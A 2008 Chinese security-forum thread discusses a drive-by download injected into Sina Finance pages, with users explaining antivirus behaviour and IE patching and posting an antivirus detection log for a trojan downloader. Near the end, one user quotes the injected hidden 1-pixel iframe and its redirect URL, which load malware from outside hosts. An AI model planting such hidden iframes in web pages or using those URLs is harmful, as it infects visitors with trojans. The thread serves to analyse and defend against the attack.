新浪财经？

深红的雪

IE补丁打过了就没有反应。

新浪本身没有问题，样本是被挂上去的

okokok

你是说13楼那个样本就是新浪被挂的？

hljdqzr

谢谢你的回答
放心了

深红的雪

是的，所谓挂马就是——浏览正常网页的同时，浏览带毒网页

okokok

扫描样本，卡巴杀
为什么IE打补丁了，浏览被挂网站，卡巴就不报了？
新浪这样的数一数二的门户网也能被挂，那其它众多网站

深红的雪

卡巴会报部分的iframe、网页和脚本，还会监控下载和网页缓存。
如果卡巴直接报网页，那么打不打补丁都一样报。
但如果网页过了卡巴，那么就要看第二道防线：数据流和缓存
如果打补丁了，代码被过滤，病毒就不会下载，那么卡巴自然不报

okokok

明白了，哈哈
换新头像了..我很喜欢

[ 本帖最后由 okokok 于 2008-1-29 22:26 编辑 ]

woai_jolin

2008-1-29 22:19:41        Real-time file system protection        file        G:\v\014.exe        a variant of Win32/TrojanDownloader.Small.NZK trojan        cleaned by deleting - quarantined        NT AUTHORITY\SYSTEM        Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.

samsinn

<IFRAME style="DISPLAY: none; WIDTH: 1px; HEIGHT: 1px" src="http://be.icast.cn/?s=finance.sina.com.cn"></IFRAME>

----> http://ppp.buyaoni.com/ww/new301.htm?032

深红的雪

辛苦了

貌似还有....
新浪那网页代码太多，看得头晕